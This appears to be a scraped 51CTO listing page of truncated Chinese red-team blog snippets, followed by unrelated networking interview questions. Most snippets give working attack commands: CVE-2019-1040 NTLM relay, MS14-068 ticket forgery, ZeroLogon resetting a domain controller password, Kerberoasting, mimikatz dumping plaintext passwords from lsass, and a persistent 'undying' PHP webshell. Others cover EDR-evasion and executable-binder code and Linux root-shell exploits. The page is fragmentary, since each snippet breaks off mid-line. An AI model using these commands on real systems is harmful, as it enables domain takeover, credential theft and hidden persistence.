CVE-2019-1040创建机器主机账号python3 addcomputer.py -method SAMR -dc-ip 192.168.145.128 -computer-name coleak2 -computer-pass pass@123 "redteam.club/hack:pass@123"中继&委派执行ntlmrelayx.py脚本进行NTLM中继,设置SMB服务器并将
MS14-068第一步:利用MS14-068伪造生成TGTMS14-068.exe -u test@coleak.com -p 123456 -s S-1-5-21-2801122135-3886333168- 273474972-1103 -d dc.coleak.com第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书mimikatz kerberos::ptc TGT
CVE-2020-1472-ZeroLogon复现检测是否存在 zerologin python3 zerologon_tester.py ad01 192.168.145.134Performing authentication attempts...Success! DC can be fully compromised by a Zerologon attack.置空DC的密码python3
Kerberoasting穷举请求指定的TGS,完成之后klist就能查看相应的票据Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mysql/12server4.redteam.club:
SPN口令爆破SPN为服务主体名称,是服务实列(MSSQL,HTTP等)的唯一标识,如果安装了服务的多个实列,每个实列都有自己的SPN,如果kerberos服务票证的加密类型为RC4_HMAC_MD5,就可以导出TGS对其进行离线爆破,有可能获取到域用户的密码了。在以下或者klist查看加密类型查询域内所有的SPN和查询test域的SPNsetspn.exe -q */* setspn.exe -
高权限读取本地密码当域管理员在域成员机器上登录进行工作的时候,会将明文密码保存在本地进行的lsass.exe进程中,可以通过mimikatz来读取到本地的明文密码。privilege::debug # 提权 sekurlsa::logonpasswords mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit" >log
不死马权限维持<?php ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行. set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去 $interval = 5; // 每隔*秒运行 do { $filename = 'test.php'; if(file_exists($filename)) { echo"
触发EDR远程线程扫描关键api:createprocess、createremotethread、void(指针)、createthread为了更加opsec,尽量采取别的方式执行恶意代码,下面简单给出一些思路进程断链#include <windows.h> #include<iostream> void SimulateKeyPress(WORD keyCode) {
项目在github已开源,获取地址:https://github.com/coleak2021/dirpro1.简介dirpro 是一款由 python 编写的目录扫描器,操作简单,功能强大,高度自动化自动根据返回状态码和返回长度,对扫描结果进行二次整理和判断,准确性非常高已实现功能可自定义扫描线程每扫描10%自动显示扫描进度可自定义扫描字典文件可自定义代理流量自动使用随机的User-Agent自
Traitor 打包了一系列方法来利用本地错误配置和漏洞来弹出 root shell:几乎所有GTFOBins可写 docker.sockCVE-2022-0847(脏管道)CVE-2021-4034(pwnkit)CVE-2021-3560它将利用 GTFOBins 中列出的大多数 sudo 权限来弹出 root shell,以及利用可写docker.sock或最近的脏管道 (CVE-2022-
原理将exe和pdf或者其他格式的文件写到资源节中,执行捆绑文件的时候动态获取并解密资源节的内容保存到磁盘的tmp目录,最后执行保存到磁盘的文件即可代码汇总加密文件#include<windows.h> #include <iostream> using namespace std; int main(int argc, char* argv[]) { in
介绍工作内容讲讲无线两个转发模式特性和应用场景工作地点意愿暂时想到这几个
1.OSPF邻居建立的影响因素2.DR、BDR在区域里担任的角色3DHCP中继不同网段客户如何发现服务器4.上网浏览小米页面,涉及到二层三层上层建立什么关系5.AP胖瘦模式和应用场景6.简历相关项目经历
1.BGP的AS-PATH属性、RR和联盟相关讲讲2.防火墙HA特性和原理3.二层trunk、access、hybrid标签的封装4.简历中项目展开讲讲
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号